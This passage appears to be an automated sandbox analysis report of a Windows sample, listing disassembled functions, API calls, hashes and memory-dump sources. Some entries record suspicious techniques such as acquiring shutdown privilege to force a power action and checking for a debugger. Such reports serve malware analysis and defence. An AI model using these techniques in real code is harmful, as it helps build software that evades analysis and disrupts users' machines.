                            • __dosmaperr.LIBCMT ref: 6CC6B9B0
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: CloseErrorHandleLast__dosmaperr
                            • String ID:
                            • API String ID: 2583163307-0
                            • Opcode ID: c792d1f1dce9563c24c653f9d44f2a4f76b8de95000c01556d7b7fbf7fe8b073
                            • Instruction ID: 37634b799899b17af7265afe1f55f15634a9e69a34b6d9501c899387fe916815
                            • Opcode Fuzzy Hash: c792d1f1dce9563c24c653f9d44f2a4f76b8de95000c01556d7b7fbf7fe8b073
                            • Instruction Fuzzy Hash: 4E010833A455201AD215063F96B57AE7BB99F83B3CF290259F91B97EC0FB60C8459260
                            Function 6CC60B9C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7944 6cc60b9c-6cc60ba7 7945 6cc60bbe-6cc60bcb 7944->7945 7946 6cc60ba9-6cc60bbc call 6cc5f9cc call 6cc60120 7944->7946 7947 6cc60c06-6cc60c0f call 6cc6ae75 7945->7947 7948 6cc60bcd-6cc60be2 call 6cc60cb9 call 6cc6873e call 6cc69c60 call 6cc6b898 7945->7948 7957 6cc60c10-6cc60c12 7946->7957 7947->7957 7963 6cc60be7-6cc60bec 7948->7963 7964 6cc60bf3-6cc60bf7 7963->7964 7965 6cc60bee-6cc60bf1 7963->7965 7964->7947 7966 6cc60bf9-6cc60c05 call 6cc647bb 7964->7966 7965->7947 7966->7947
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction ID: 255065eed86daa86ad1437724702a7dda79d75404a9f95ae480282aa1aaf5bb9
                            • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction Fuzzy Hash: AFF0F932901A547AC6211A3B8F80BCB33989F8237CF100715E961A3ED0FB71D449C7AA
                            Function 6CC55960 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC55AB4
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC55AF4
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID:
                            • API String ID: 323602529-0
                            • Opcode ID: 056bd210ffa63ac12098cf766cb0cf2f107cfd80170dc691e886730c76da8999
                            • Instruction ID: 3744d6ea5a68e533d5dfffc8e520dd527278eca1211e4e23af249a22854736c2
                            • Opcode Fuzzy Hash: 056bd210ffa63ac12098cf766cb0cf2f107cfd80170dc691e886730c76da8999
                            • Instruction Fuzzy Hash: 56515871601B40DBD725CF25C485BE6BBF4FB04718F848A1CE4AA4BBA1EB34B559CB84
                            Function 6CC5EF3F Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(6CC86DD8,0000000C), ref: 6CC5EF52
                            • ExitThread.KERNEL32 ref: 6CC5EF59
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ErrorExitLastThread
                            • String ID:
                            • API String ID: 1611280651-0
                            • Opcode ID: b5b4a8d90974bbc4207b0b175733afffa7e33e0338cfd14be0fbdcfb99a2d4fc
                            • Instruction ID: 5f98a3d28d530680d5a94486f63429f6a60c1b3e5f72f1967f26f7bf7017be05
                            • Opcode Fuzzy Hash: b5b4a8d90974bbc4207b0b175733afffa7e33e0338cfd14be0fbdcfb99a2d4fc
                            • Instruction Fuzzy Hash: 48F0C271A10600AFDB00DBB1C449AAE3B78FF42219F544289E00697B41FF355925CB91
                            Function 6CC6AF72 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: 58c269a236040e275d47c4b0a5fe2560cd1562607ae4c5f674325a2ad342db78
                            • Instruction ID: 580fc5439ac059497f0d213fa1f712bbc1565ea682752875b60e4c2b3c25cb22
                            • Opcode Fuzzy Hash: 58c269a236040e275d47c4b0a5fe2560cd1562607ae4c5f674325a2ad342db78
                            • Instruction Fuzzy Hash: 6A118C71A0420EAFCF05CF59E945A9B3BF8EF48308F044059F808EB301E631E921DBA4
                            Function 6CC73FFE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction ID: a05d8d777258b9cd599591cd82b689a9bd916489b0ab1b3382e1d88b45c7ba8e
                            • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction Fuzzy Hash: 1A012872C01159AFCF12DFA88D44AEEBFB5EB08214F144165ED24A26A0E7318A25DB91
                            Function 6CC74457 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000000,?,6CC74115,?,?,00000000,?,6CC74115,00000000,0000000C), ref: 6CC74474
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: f6412b3c77fd3ec8736f0c5345de4b266a80f122e0b7ffc203085e135d578c44
                            • Instruction ID: 053f7ba73918229063323063be7acfda25a0542d6491904c749339b8bdc14b1f
                            • Opcode Fuzzy Hash: f6412b3c77fd3ec8736f0c5345de4b266a80f122e0b7ffc203085e135d578c44
                            • Instruction Fuzzy Hash: 69D06C3210010DBBDF028E84DC06EDA3FBAFB88714F014000BA1856020C732E861AB90
                            Function 6CB27F40 Relevance: 1.5, APIs: 1, Instructions: 1COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction ID: a855a0250adc46fe3c422d9be574db4e7ce3b148c067bdc0db52ad34f47b2ded
                            • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction Fuzzy Hash:

                            Non-executed Functions

                            Function 6CC51880 Relevance: 10.5, APIs: 3, Strings: 1, Instructions: 3538COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: g)''
                            • API String ID: 4218353326-3487984327
                            • Opcode ID: 5552da4137e7546ecf1948dfe0365d78561b4514e42cf5883bafee385441c92e
                            • Instruction ID: 614e16883929e4b1acebe6d8f27729e73785908868548105662dc59c789c4107
                            • Opcode Fuzzy Hash: 5552da4137e7546ecf1948dfe0365d78561b4514e42cf5883bafee385441c92e
                            • Instruction Fuzzy Hash: 50632171644B018FC728CF28C8D0A95B7F3BFD53187998A6DC0964BA59FB74B46ACB40
                            Function 6CC55D60 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 31nativeshutdownCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 6CC55D6A
                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CC55D76
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CC55D84
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CC55DAB
                            • NtInitiatePowerAction.NTDLL ref: 6CC55DBF
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3256374457-3733053543
                            • Opcode ID: 3e9429a6a251c543c39a75727f85fd5b75beb6d6caed2fb9916dc9d09f61e0e0
                            • Instruction ID: 28d0bad29217a33125e2f51381d6539a77060fc5492701cf428082f5ed72f490
                            • Opcode Fuzzy Hash: 3e9429a6a251c543c39a75727f85fd5b75beb6d6caed2fb9916dc9d09f61e0e0
                            • Instruction Fuzzy Hash: E6F0B470645300BBFA00AF24DD0EB9A7BB8EF45705F414508FA45A60C1E7B068A4CB93
                            Function 6CAD1950 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 594COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: \j`7$\j`7$j
                            • API String ID: 0-3644614255
                            • Opcode ID: 9578f835e1741fb7bb0e4b2699c859878d1fa300d5b876e22059030d813f2a87
                            • Instruction ID: ee0584af41d0a3b671cc98232f78fdce2e409d417342794dcdf6201db9179f70
                            • Opcode Fuzzy Hash: 9578f835e1741fb7bb0e4b2699c859878d1fa300d5b876e22059030d813f2a87
                            • Instruction Fuzzy Hash: 594236746093828FC724CF68C480A6ABBE1BBC9364F294A1EE5D5C7761D734E885CB53
                            Function 6CCE84AC Relevance: 8.7, APIs: 1, Strings: 3, Instructions: 1656COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCE84B1
                              • Part of subcall function 6CCE993B: __EH_prolog.LIBCMT ref: 6CCE9940
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 1$`)K$h)K
                            • API String ID: 3519838083-3935664338
                            • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                            • Instruction ID: 6e2873fe4e938a2b9686d8ad84377bca1cfdce6d7bfe0af8d1e24c5793740712
                            • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                            • Instruction Fuzzy Hash: 98F27C70D01248DFDF11CFA8C884BDDBBB5AF4A308F244499E449AB791EB759A85CF11
                            Function 6CCDAEEF Relevance: 8.3, APIs: 1, Strings: 2, Instructions: 3058COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCDAEF4
                              • Part of subcall function 6CCDE622: __EH_prolog.LIBCMT ref: 6CCDE627
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $h%K
                            • API String ID: 3519838083-1737110039
                            • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                            • Instruction ID: 0da6a2f45b01c949759f9f81bc01bd2127eb563010bc0e0be0ba8f460b0b8eae
                            • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                            • Instruction Fuzzy Hash: 13537830D01258DFDB15CFA4C994BEDBBB4AF09308F1540D9D54AA7A91EB30AE89CF61
                            Function 6CCEC7F3 Relevance: 6.8, APIs: 1, Strings: 2, Instructions: 1546COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $J
                            • API String ID: 3519838083-1755042146
                            • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                            • Instruction ID: 4832ee7d8ade5f05d335c4b9311e7f6283dbd3b2436cc2b830a2c0bc149655c8
                            • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                            • Instruction Fuzzy Hash: 4CE2CE70A05289DFEF01CFA8C584BDDBFB4BF4A308F244099E855AB681EB74D945CB61
                            Function 6CCB6CE0 Relevance: 5.4, APIs: 1, Strings: 1, Instructions: 1923COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCB6CE5
                              • Part of subcall function 6CC8CC2A: __EH_prolog.LIBCMT ref: 6CC8CC2F
                              • Part of subcall function 6CC8E6A6: __EH_prolog.LIBCMT ref: 6CC8E6AB
                              • Part of subcall function 6CCB6A0E: __EH_prolog.LIBCMT ref: 6CCB6A13
                              • Part of subcall function 6CCB6837: __EH_prolog.LIBCMT ref: 6CCB683C
                              • Part of subcall function 6CCBA143: __EH_prolog.LIBCMT ref: 6CCBA148
                              • Part of subcall function 6CCBA143: ctype.LIBCPMT ref: 6CCBA16C
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog$ctype
                            • String ID:
                            • API String ID: 1039218491-3916222277
                            • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                            • Instruction ID: 671e7af4a42c59b890e14e954f9543d470d6f978196ad4b55753b17358c1c703
                            • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                            • Instruction Fuzzy Hash: A603BD30805289DEDF15CFE4C984BDDBBB0AF15318F24409AD849B7A91EB349B89DF61
                            Function 6CD0C580 Relevance: 5.2, Strings: 4, Instructions: 153COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: 3J$`/J$`1J$p0J
                            • API String ID: 0-2826663437
                            • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                            • Instruction ID: bbeda915d2eba73a4788b6aea0468685e48b5ffd653aedbffd95e67010262a6f
                            • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                            • Instruction Fuzzy Hash: CC41E772F10A601AF3488F6A8C855667FC3C7C9346B4AC23DD665C66DDEABDC40782A4
                            Function 6CCE0A52 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1212COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: W
                            • API String ID: 3519838083-655174618
                            • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                            • Instruction ID: f9b9acb43a77431563ac4ad96ab9d49baf1734ef827cacd6f83d0fee99dbadc0
                            • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                            • Instruction Fuzzy Hash: 99B26B70A05259DFDB01CFA8C484B9EBBB4BF4A318F244099E845EB752EB75DD41CBA0
                            Function 6CC60181 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CC60279
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CC60283
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CC60290
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: 21e72b8c1a5f159e15519ab7b31e2174527ba7e6853dd892363d8840039c387b
                            • Instruction ID: d264399738e0fe25a3c8343e1155882f262a3ba6f3f4dc2a53e474027e67f6d6
                            • Opcode Fuzzy Hash: 21e72b8c1a5f159e15519ab7b31e2174527ba7e6853dd892363d8840039c387b
                            • Instruction Fuzzy Hash: 4A31D47490122C9BCB21DF29D988BCDBBB8BF08314F5041DAE41DA7650EB349B958F48
                            Function 6CC5F17D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,?,6CC5F235,6CC59C49,00000003,00000000,6CC59C49,00000000), ref: 6CC5F19F
                            • TerminateProcess.KERNEL32(00000000,?,6CC5F235,6CC59C49,00000003,00000000,6CC59C49,00000000), ref: 6CC5F1A6
                            • ExitProcess.KERNEL32 ref: 6CC5F1B8
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
